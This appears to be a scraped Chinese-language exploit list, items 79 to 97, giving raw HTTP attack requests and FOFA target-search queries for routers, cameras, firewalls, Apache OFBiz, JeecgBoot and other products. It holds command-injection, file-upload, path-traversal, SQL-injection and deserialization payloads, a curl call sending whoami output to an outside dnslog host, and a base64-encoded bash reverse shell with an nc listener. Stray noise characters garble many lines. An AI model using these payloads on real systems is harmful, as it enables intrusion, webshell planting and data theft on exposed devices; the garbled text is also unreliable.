: Z& U( G M9 xContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
. H4 I# }6 e4 b& Z. _Content-Type: image/png* F4 a& y5 z) v- w7 g' y
; Q' u- y, X$ Z
YsOxWxSvj1KyZow1PTsh98fdu6l
: E- X/ n y. ?+ k# E) ]% o' L------YsOxWxSvj1KyZow1PTsh98fdu6l/ x# a8 t3 h' T/ z$ ?9 g! O3 ]
Content-Disposition: form-data; name="target" H9 \, w& N( z7 v3 [
4 K* W' W$ j8 @. E/ g
/Applications/SkillDevelopAndEHS/
8 E5 O/ _' _0 x9 o, n1 t------YsOxWxSvj1KyZow1PTsh98fdu6l--7 H. E% Q% X! ~ U
- S4 G6 {9 g. H0 z
# j* c7 g9 y8 T7 z/ ]1 r
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
( R7 ]& c$ L( ?2 p2 ?. h+ CHost: x.x.x.x
$ b0 s* j# Z% D1 K
9 {3 l! V) Q) N6 W Z9 R4 {6 u' w' [% \" ~- V( e
79. BYTEVALUE 百为流控路由器远程命令执行+ K: ?" M7 R" [8 Q* r! j; r
FOFA:BYTEVALUE 智能流控路由器
3 l; P9 y3 V Q4 ^# o# W# x$ iGET /goform/webRead/open/?path=|id HTTP/1.1+ ~+ ~/ ?1 g. p+ w2 r4 e9 r
Host:IP
6 H6 ~/ O! h3 o3 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
/ I7 ~9 k+ P* mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* v6 `+ C0 X3 l& |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 {: B, t" V7 V$ n8 r* IAccept-Encoding: gzip, deflate
# ]9 n: v2 i. K! Z4 M% l+ OConnection: close% X8 E; k( {8 G% R
Upgrade-Insecure-Requests: 1
u W( x' N4 u$ {) e; d% A4 m+ g m4 N7 C0 ?/ i5 D5 n+ K
! f) z* b7 H7 J+ M4 r80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传# @0 U+ t# {3 _# G; ]
FOFA:app="速达软件-公司产品"
1 b6 P( Z+ k5 N4 {6 u3 k+ |5 u# v5 WPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
( B* b) i/ i2 B L% N C% s/ @3 ]Host: x.x.x.x p5 k) p0 ~$ @3 H2 c4 ]4 p; B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: n3 j5 `: ]( pContent-Length: 27
5 i, I. _2 W) C4 m! H6 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 z( F; h; K8 |' i
Accept-Encoding: gzip, deflate( k' Y% Q$ H" F+ b* Z1 p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- [# C0 M7 _6 f8 Q5 s0 e' ~, P; l
Connection: close
+ ?; T% i' B% \8 J9 yContent-Type: application/octet-stream/ E, B! S7 W0 L! h1 b& {# i1 Y a
Upgrade-Insecure-Requests: 1
[+ Z% K, u; _. M4 K
. A, w. z( o9 ]- t6 X- ^+ E<% out.print("oessqeonylzaf");%>8 M5 j! Z: g% V y
4 n0 q2 q& N" K0 W& m4 @
# i% a/ j. u+ N+ I* i0 b- ]GET /xykqmfxpoas.jsp HTTP/1.1
% C# g3 Q; H7 }3 g! ~Host: x.x.x.x: _3 {$ C, M8 J I/ f3 q4 M C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& \3 f/ W' [" K4 M/ X0 l4 o6 s
Connection: close
7 l7 q" t# l3 Q/ Y0 _- b7 yAccept-Encoding: gzip
) Q' k# ` Q. C% q" V4 B) n5 a w
( a5 P6 A. h1 L& G$ W6 ^, W
- u- m4 o& u6 r8 @3 }- q1 y! M81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露9 M& e: y& ^) d" B6 t
FOFA:app="uniview-视频监控"
, B1 S# f# x( |; T" L* P9 G$ i# i' NGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
# J d& Y- K% a& `9 }8 y! b0 S3 oHost: x.x.x.x( ]1 c" l& Z$ I$ ]3 D- W4 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 x7 H& C! b7 I- \9 L
Connection: close+ x3 F- X& O6 J! T& J5 i* F
Accept-Encoding: gzip/ J# [% b5 J& o# |
/ o& p! W5 A- t R4 T
/ v+ N9 ^" M9 _2 x K4 w
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
$ R7 ~& }+ n9 L- |! G# \& s# HFOFA:app="思福迪-LOGBASE"$ m6 J9 x, d5 P
POST /bhost/test_qrcode_b HTTP/1.1# s1 b4 M& I) C+ j+ w8 n
Host: BaseURL
5 m% f! U. U' ~# R& _' qUser-Agent: Go-http-client/1.1
% I( l: q& b: }9 EContent-Length: 23
6 g+ Q3 \0 w$ xAccept-Encoding: gzip( n3 e+ O0 p# o; [! {) P
Connection: close
" v& I! E, ^/ h" i( M) o! vContent-Type: application/x-www-form-urlencoded
' l+ ~3 F' ?6 u3 Y' i0 ?: v7 LReferer: BaseURL
: c) r8 j+ U3 g9 P. A1 _
$ N. B. x1 v& U, V% W tz1=1&z2="|id;"&z3=bhost
- _- I# `3 h6 ?0 f+ E% D z6 l* a4 g* D
: a. s$ A) _4 n& w2 U; `
83. JeecgBoot testConnection 远程命令执行* F" @/ U1 u* p. @2 `" G
FOFA:title=="JeecgBoot 企业级低代码平台"
/ ^; B, R) y$ f' t5 i) D" h& c' \, h5 \; t
2 C; R" Z3 ^& d5 s3 @* DPOST /jmreport/testConnection HTTP/1.1. C A0 j' w6 R/ ^7 Y
Host: x.x.x.x* |: Y A6 D# d& X- V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 P' V4 k9 G# z' F: UConnection: close
' r/ }/ r- f! k1 d: BContent-Length: 8881
; i1 a- D5 Q+ x/ V) a4 S/ ZAccept-Encoding: gzip/ p W4 E! N' t3 p
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
7 d& i: o* Z: w1 A% FContent-Type: application/json
; \& q$ D3 A: s1 Y/ u
) I! R3 j1 B3 [/ ?$ JPAYLOAD
) g' k0 ]& ~, c g n7 ^4 s6 @6 q3 D3 U" s' U. D
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
6 c7 V. o$ h7 f% |% s6 uFOFA:title=="JeecgBoot 企业级低代码平台"/ v/ g5 X, \ G# \, T4 B0 E- u
; N, {9 N ^- D. U
3 M$ P/ p5 \4 L$ k: m
5 I/ c" T0 @0 U$ J1 Q2 v) y, CPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
- |4 l! L, E/ \) P9 {# sHost: 192.168.40.130:8080
. q3 x4 I' t* l ]) hUser-Agent: curl/7.88.1
7 j8 L( |5 M! ^7 i3 ?" C2 XContent-Length: 156
6 _9 W4 o3 v# E7 NAccept: */*. e7 X' s! O/ Z, L, x1 F
Connection: close
; U3 C' A$ r2 EContent-Type: application/json
- ]4 r' N% ]/ j# kAccept-Encoding: gzip9 m$ G# K6 V2 w) j, z$ K4 k
( w, f/ C; L! F* C T( `. f+ Y& {{2 k) n$ _9 U( `* V+ B8 R) Z. \5 g
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",+ r( f1 J( p' r D, j
"type": "0"1 W0 T& F+ a% S- _
}" x2 W4 o% O% v0 [& O
B; C+ A; _0 O# P& v& i4 K$ k8 V! H
85. SysAid On-premise< 23.3.36远程代码执行: r# O$ l/ p4 C& `) |9 c
CVE-2023-47246% |" x( A! ~" \; [4 a
FOFA:body="sysaid-logo-dark-green.png"
- v; A6 }7 |' ^8 vEXP数据包如下,注入哥斯拉马8 ]1 N5 T& }, B" e/ Z8 v
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.16 u; G I% C( V( @
Host: x.x.x.x2 r4 F. E# g/ A. C8 |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 N# x, B! e" b ~! e; zContent-Type: application/octet-stream
+ W0 x" T) j9 M$ p+ ZAccept-Encoding: gzip7 R3 J: ^" @7 I: y3 g- V0 f
+ Y" T5 x7 `8 k" f% ~- x( r' h
PAYLOAD
' W4 o, t4 c B" `5 D" z: u' w- ~
2 Z% N/ I4 b; x# U回显URL:http://x.x.x.x/userfiles/index.jsp: n8 a. g1 o4 g5 j& h& q- W
5 w5 b; g0 O: n
86. 日本tosei自助洗衣机RCE- O. {: a+ j. ~! o j; k, j
FOFA:body="tosei_login_check.php"
- s3 G) v! \& T. |& ?' ePOST /cgi-bin/network_test.php HTTP/1.17 p. M8 J! C. M* G
Host: x.x.x.x' W9 c _ \' x1 v- m$ A
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
2 t9 Q4 r* e6 o7 i) ?" }$ tConnection: close
/ j1 h* x4 z) P# y, Q; S0 @* eContent-Length: 447 w9 w; e, j/ H' B7 C$ G+ J6 Q
Accept: */*
$ O: p! \4 ?$ S( K/ p$ BAccept-Encoding: gzip3 `4 B, Q1 X* w7 R9 i5 s
Accept-Language: en
% w8 z" y% ~9 L1 D9 |Content-Type: application/x-www-form-urlencoded- q {8 v& m! F7 ~+ A1 S7 H7 O
- F! D9 O- ^9 P& C0 r) ^
host=%0acat${IFS}/etc/passwd%0a&command=ping
, Q% X! f: h* x! `! e& O
' j5 R% ]! d$ j$ _+ ^( M4 T, L4 J- h5 F& |+ l' g
87. 安恒明御安全网关aaa_local_web_preview文件上传
, b! l5 V {2 h/ A; J0 E$ e/ b( nFOFA:title="明御安全网关"4 k8 b+ w, s5 A" e9 b
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
3 ~* e1 n' ?; X0 w2 n- N) lHost: X.X.X.X
; v. l, v# b4 p# O# w) fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
L, t/ g9 b; W* F+ U' WConnection: close8 J; o9 q* Q; D) O9 ]7 M$ s
Content-Length: 1987 T' |8 t/ n) ~- M. A) h
Accept-Encoding: gzip9 J: J0 i4 r; i: c. z/ ` i m) c
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd: q/ \; Y9 O3 ~0 I9 x! ~
2 P( x5 b* S0 T. f' U; O. K+ y0 s--qqobiandqgawlxodfiisporjwravxtvd
9 T2 U9 m1 w7 i, f9 z4 a+ PContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
6 K3 B5 N$ K4 Q6 zContent-Type: text/plain5 T9 X! u( i' H) N) w4 y; \
+ K) H, x3 v% e h0 P _8 I' Z
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
1 E% e: j+ u, L--qqobiandqgawlxodfiisporjwravxtvd--, T8 j5 e& W+ z# H# ?
0 R% d" Q1 z1 x3 s) I
+ P7 Q) N$ ~+ u. f+ c/jfhatuwe.php
: T0 u! c' Y/ Y7 a9 j
( { l) V' ?$ g88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
' I* Z) J% \. o& oFOFA:title="明御安全网关"
1 X, n; a$ @; Q' E: n& R8 j) a( B+ f+ zGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
& { ~5 T& G/ k8 f! F* }3 wHost: x.x.x.xx.x.x.x# j* u, W" ?1 y# \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ s; k# ^# s/ j( YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 K& n$ ^9 T+ S' c# ^7 E" C5 qAccept-Encoding: gzip, deflate
0 D* k1 K8 j2 o) N1 g, ]! _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 o: q# C$ S9 I# x- U4 }
Connection: close
% W, s2 M. C. S Z1 U3 n7 `4 N G1 }! T' i* W9 ~* o& O z
' H. C, K5 a2 U/ i& D9 s8 N
/astdfkhl.php& o- V% l" u/ B- j8 k, i& O6 Q. u( P
: B9 v/ w7 Z5 c4 g# G
89. 致远互联FE协作办公平台editflow_manager存在sql注入2 H* }- A) y3 N" }+ ?; ~
FOFA:title="FE协作办公平台" || body="li_plugins_download"
1 L H6 C3 T7 zPOST /sysform/003/editflow_manager.js%70 HTTP/1.10 ^- r% X& o! v, o! `/ C: e
Host: x.x.x.x
7 p2 T% a) O* t+ J9 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. j4 d4 P8 j( V% k, k8 h C# Y/ e3 o
Connection: close" @2 I+ t: [, N" C. O
Content-Length: 416 m" F! r( q+ Z [$ _1 E
Content-Type: application/x-www-form-urlencoded
6 Q; S2 n3 H1 U% _Accept-Encoding: gzip$ G& L% L) V, ~+ K: F& g* e
* Y( D: {" Q/ {, H
option=2&GUID=-1'+union+select+111*222--+9 e. w( f* P) f `6 s: k
' c7 H9 R2 K/ M# {: |! {, c
) i+ s* Y% R0 _, ]3 t' z5 v
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行. p. A, l) Y" |
FOFA:icon_hash="-1830859634"8 }! o* e4 \& h" E4 z- _
POST /php/ping.php HTTP/1.1
& E6 O& k8 x \& m- QHost: x.x.x.x) y& B& N6 C. p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
. b( P! F6 w7 B. P9 ^* fContent-Length: 51
: _/ L* y" Z" Y* rAccept: application/json, text/javascript, */*; q=0.01, y& R, m: v# Z/ u- a# _0 `
Accept-Encoding: gzip, deflate5 G8 S8 {1 T# C* ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 X% w- ]4 q# @3 P( |
Connection: close& `2 N6 V. P( e% _4 D$ H1 W# b
Content-Type: application/x-www-form-urlencoded1 |/ j5 t x8 n4 d# l+ a+ n9 q* z
X-Requested-With: XMLHttpRequest
% a' t- i% ~1 j% Q# o, `1 d- M8 G. Y* D7 v: {
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
2 [" A8 w2 @) Z+ l. b4 x" Z* a8 }, @) |6 ?- y; v
" {7 U# e H* U" U' y91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取3 w, H# e3 e8 H k" F
FOFA:title="综合安防管理平台"
: A# {7 D8 _+ t) CGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
1 @2 [% E7 l( A: y* o" CHost: your-ip; r' O$ s7 V; k$ {* G( N2 m) n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36- Y/ O) C9 s& e+ Q0 U4 R; h |
Accept-Encoding: gzip, deflate
0 [8 S6 S6 U! V6 z3 d7 AAccept: */*
' m( [7 I. ^ u0 d( |Connection: keep-alive
4 M" ?! k- F1 W
1 b( |5 Z. r3 i, l$ \7 B3 O' p4 y( l+ }/ v) ]
% S3 y8 M6 H9 a V9 n( i. A$ x92. 海康威视运行管理中心session命令执行
$ V' L7 y& e) q) D) gFastjson命令执行
5 s! i* N3 c+ x/ O% L* T Fhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
0 E; J4 ^0 o& q% T! Q* {0 z1 U5 `, EPOST /center/api/session HTTP/1.1
9 B. f3 l! T9 `% ZHost:
1 X/ w: ?0 z! q+ N \- [Accept: application/json, text/plain, */*
9 D5 M4 L* M, n* q2 NAccept-Encoding: gzip, deflate& c2 ]2 g$ a2 f' s) |
X-Requested-With: XMLHttpRequest& e4 P3 t2 x6 o/ n
Content-Type: application/json;charset=UTF-8
' D) C8 k2 f' {& s. t. i5 iX-Language-Type: zh_CN/ [/ m& }; s; N$ d
Testcmd: echo test' W! ~# h$ m6 g+ o: T8 |6 q s! ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
( @/ ^6 f9 e+ tAccept-Language: zh-CN,zh;q=0.9
. L+ c8 |9 c+ p9 kContent-Length: 5778: }1 D4 L2 r( u$ ] K, C- [
) u7 ]: k- n0 N
PAYLOAD8 j& V m2 }* [7 @/ b
5 |7 ^9 y* S1 o1 k- o
: S. [/ K H! [/ C! C$ q93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传0 \; p- p; R$ z
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg==": z- Q) ^! s$ {
POST /?g=app_av_import_save HTTP/1.1
% A$ F( W+ z0 S) S1 T0 lHost: x.x.x.x
, P, L: U' K& w) PContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx. |9 K% q5 i" o3 r6 P
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 Y) F4 w8 t2 Q6 \ L* L; ~0 O3 \- @8 A& I N' R. s: |
------WebKitFormBoundarykcbkgdfx
. E# k% I {7 \! s6 qContent-Disposition: form-data; name="MAX_FILE_SIZE"1 T* r, w0 U- ?7 o) M6 A3 L
5 R; D0 b; S' F' C
10000000
2 G/ [8 X7 {) b9 D s7 N4 g------WebKitFormBoundarykcbkgdfx7 P% }0 f/ n$ V/ x; U- w3 D
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"" K$ Q/ [4 J( R2 M6 |- a% t" Q
Content-Type: text/plain
8 |2 L. `* z' `5 d0 E# J* z, D
* }! K0 T/ l& {. r6 rwagletqrkwrddkthtulxsqrphulnknxa
* T0 C" k0 |( t- t------WebKitFormBoundarykcbkgdfx+ O% @ k; M: _1 A
Content-Disposition: form-data; name="submit_post"% v3 B2 @0 P" R4 [6 m
# R% C* v# f5 k8 ~& p
obj_app_upfile& z9 Y4 X( |8 w0 i
------WebKitFormBoundarykcbkgdfx9 m7 E7 {2 a2 L) @/ `4 N3 N
Content-Disposition: form-data; name="__hash__"+ s: ]. q z) `: d
. ]6 ?& _1 j! R2 L3 Q% F" W4 X0b9d6b1ab7479ab69d9f71b05e0e9445
. S+ P/ Z6 q' }' _! [------WebKitFormBoundarykcbkgdfx--. N( V* |( g: H. p
, J9 g3 f* n: a5 y& w5 g! I
( ^7 ?$ m2 f) T* |& lGET /attachements/xlskxknxa.txt HTTP/1.1& e$ X4 {3 Q3 x' ]0 M. b2 }% E
Host: xx.xx.xx.xx
y- Z- i$ F q: P. ?User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& k0 P8 E D5 \5 J+ ?7 x: g6 n
+ \6 o0 \0 \; f! i: O' U% L. @( `
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传3 J& y( h* V1 t6 n. E1 n, a9 L; ~
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
* Q2 D: i2 w% _7 B5 Z- ePOST /?g=obj_area_import_save HTTP/1.17 \- W7 N( c9 l+ S! C, M
Host: x.x.x.x
, b2 \) A1 Q+ a$ R+ T( H& iContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt: w# J* F* L) i9 T2 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36/ J6 B0 {8 Y. j' ^3 Z+ e* w. K
$ }$ X% f6 `$ l/ P" x/ J# _% N------WebKitFormBoundarybqvzqvmt
4 ~/ d4 U0 i; rContent-Disposition: form-data; name="MAX_FILE_SIZE") ?5 Z" ?5 m& o& T
$ n& f' G* x; p5 T/ h% B; w' l: ^10000000- v8 c, \& P% X v4 T) g
------WebKitFormBoundarybqvzqvmt
4 F7 B+ I( v0 o/ o6 Q, Q3 `Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"1 j& v6 @3 K2 Y
Content-Type: text/plain3 w# K' ]' C6 i" g( r. `* M. n
- f1 U; [; |$ wpxplitttsrjnyoafavcajwkvhxindhmu
& A! ~, k% ], [+ f4 B------WebKitFormBoundarybqvzqvmt& C% P1 I0 P- m
Content-Disposition: form-data; name="submit_post"6 g- N' w; k7 K) ]& [4 J N1 ?% p
( U6 C2 y( y9 }+ a0 ~+ Tobj_app_upfile
9 }+ s. M% P/ [! N8 F------WebKitFormBoundarybqvzqvmt4 U( }3 _; j, I( B! C* m- N6 k& F2 n
Content-Disposition: form-data; name="__hash__"
/ p( { }' k$ c/ D" Y$ x" ^% d M( K" c; E* e( H, J: j) s
0b9d6b1ab7479ab69d9f71b05e0e94450 g( \% N8 C1 T/ I/ e0 f
------WebKitFormBoundarybqvzqvmt--% O9 b* ]9 G; E" R0 C8 x3 r
$ k7 K8 @% e& E3 I+ J
' |5 k' e+ p; l8 d) f! \" X# c# D0 O6 b, C3 j& f6 W8 B! d
GET /attachements/xlskxknxa.txt HTTP/1.1
* p# b! v8 D* ]& k6 |2 c5 wHost: xx.xx.xx.xx
8 M+ Q' @- l2 p+ v& k( WUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! T: I7 \9 b; f$ C5 f4 w8 A* S- z5 q& V* }, _( j; H; X+ f3 x7 S- p
0 Y7 L* ^0 s6 g
+ Z H# d! |; c# b) h
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
" s" w1 Z* V0 x! gCVE-2023-490707 V: R9 a/ U0 w, |0 b
FOFA:app="Apache_OFBiz". \! |) a* D' b
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
" E5 L e8 `* j! ~( e9 [Host: x.x.x.x* S( x* d, t7 x7 \, Y2 Z2 b1 } {
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36; k1 ^6 A" L1 |6 v- W }3 a
Connection: close
! j2 A: s" r( m- q+ RContent-Length: 889
) Q; _- {! \3 y& aContent-Type: application/xml
0 U' q. Q4 R$ uAccept-Encoding: gzip
! B' X5 K4 L, y/ H* y
7 m* N- `1 c' v' L- a( ?2 [<?xml version="1.0"?>
" N# i! d; Y8 F! q<methodCall>
6 T% L% d5 i& V- M# r# K <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName> d( N i1 Y6 k/ [# U. A, x& p$ k U
<params>. M' f0 o# E$ T0 O
<param>
7 e+ H" M4 q* }; N4 Z8 f# v( ? <value>
$ y6 T* I. I5 O <struct>
1 e7 x W4 b! U( B, b$ c7 W <member>
4 v% g' Z2 U. F/ |2 W <name>test</name>
+ J5 G9 `( y, ^$ u( h <value>" D' Q2 L! `9 ^ V& `
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>9 m- M$ N; Z! [
</value>, e& n- N( d- \5 r
</member>0 I- i1 n& s5 x( C0 L- }
</struct>- M/ `5 o( z% `9 Z2 h
</value>
4 @% `% r6 L% @, O. k% h1 L </param>
; q) t1 H- P) y6 p: M5 d3 v& j* q ` </params>
2 d* o! I! { E* Y( O. F</methodCall>: @/ ]7 y/ S, \9 s. `
; H* M% l2 _$ Y6 I6 q- m& N! ~. ^0 s, S( y0 c3 k3 S* _* m% m7 m
用ysoserial生成payload
1 j, w7 \# ~- c3 W4 F; k) d1 u9 Rjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"8 `6 j4 r& _' g9 Y# W
+ B4 g1 k# W4 }/ u# s0 W9 g6 ?/ N% S: C$ N& r6 e
将生成的payload替换到上面的POC( f+ d. P7 g+ I- l# I' ~; v
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1& h9 S; @2 u2 A, s
Host: 192.168.40.130:8443
4 A, z% `( U8 q1 j8 JUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
2 w U5 A b3 y& |8 L" T( @; h) SConnection: close7 \5 }& ]! g0 [) s0 x# |
Content-Length: 8890 w6 R |! r2 H; J6 q. f7 g+ o
Content-Type: application/xml* z9 Y8 \; O G2 t' U! d3 O0 d4 ?
Accept-Encoding: gzip- d1 K; V& }2 U9 W3 H
- q, K6 t! f$ n6 s
PAYLOAD$ u; r! G a6 ^5 _0 Z5 @
$ H1 N( T' x- V, V
96. Apache OFBiz 18.12.11 groovy 远程代码执行
$ e s5 R. W; @+ FFOFA:app="Apache_OFBiz"
4 [" F9 V: F3 q* g" c7 [) hPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
9 f8 O( Z- S, y6 y/ n1 mHost: localhost:84431 e |) ~# Y1 l! C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
7 m8 C5 a# b rAccept: */*. T. K+ w+ c2 u% t% ~. s; q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! M d3 a9 x0 [ @, C$ b( w
Content-Type: application/x-www-form-urlencoded. x5 }# G$ n0 N6 @. ^
Content-Length: 554 E* R, ~5 }% C: ]/ H" U
! S! z3 @: K4 Z+ ~0 D; E" D' k. C
groovyProgram=throw+new+Exception('id'.execute().text);
& O/ k5 Q$ q3 |8 Y9 c# ^7 n( \: w8 T% [! r7 D. X
( l- u2 m6 F, v& V7 `" R0 |( g7 l3 B反弹shell! P+ {" R3 X3 }9 ]/ N
在kali上启动一个监听
' _* `7 L8 r ~$ Q% X0 g2 f x: rnc -lvp 7777& q6 i' `6 W1 X, q
; S+ M5 w6 `! T" m, d4 M6 W
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1# G% S1 ?1 y0 Z& m
Host: 192.168.40.130:8443
) g( l' d( g8 ?; s# x% v% G. @5 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
6 @/ D* A2 [# p; nAccept: */*
' f, O# D5 t5 O) _7 n* Q* vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 \7 X" P/ B$ _0 {5 \2 S/ |
Content-Type: application/x-www-form-urlencoded- I9 I3 |9 h$ p3 j" k7 ` U
Content-Length: 71
" Q% u" y9 x% V8 ?: w% A5 Q" V
. D; |0 ^8 \! a8 C$ ~2 k2 zgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();: t4 {& I9 K, U. p
6 u9 ~: v+ X- d- e1 F* j97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行9 i6 k2 G! z& x. g
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
6 B4 W, T, J& n8 P/ Y3 b" xGET /passport/login/ HTTP/1.1- ]4 w- x/ }1 p/ Q, n1 k
Host: 192.168.40.130:8085
3 k2 @' L! I& tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 H+ ]; {' D, d1 j! Z) O4 vAccept-Encoding: gzip- g7 J g/ ^8 h
Connection: close" ~ V# A- g% p' S5 q0 D7 @
Cookie: rememberMe=PAYLOAD
' n6 }1 I+ i* }0 ~/ z5 HX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
) o c" p: u# |: [) d
) R( @/ I' o5 H; |! F6 p
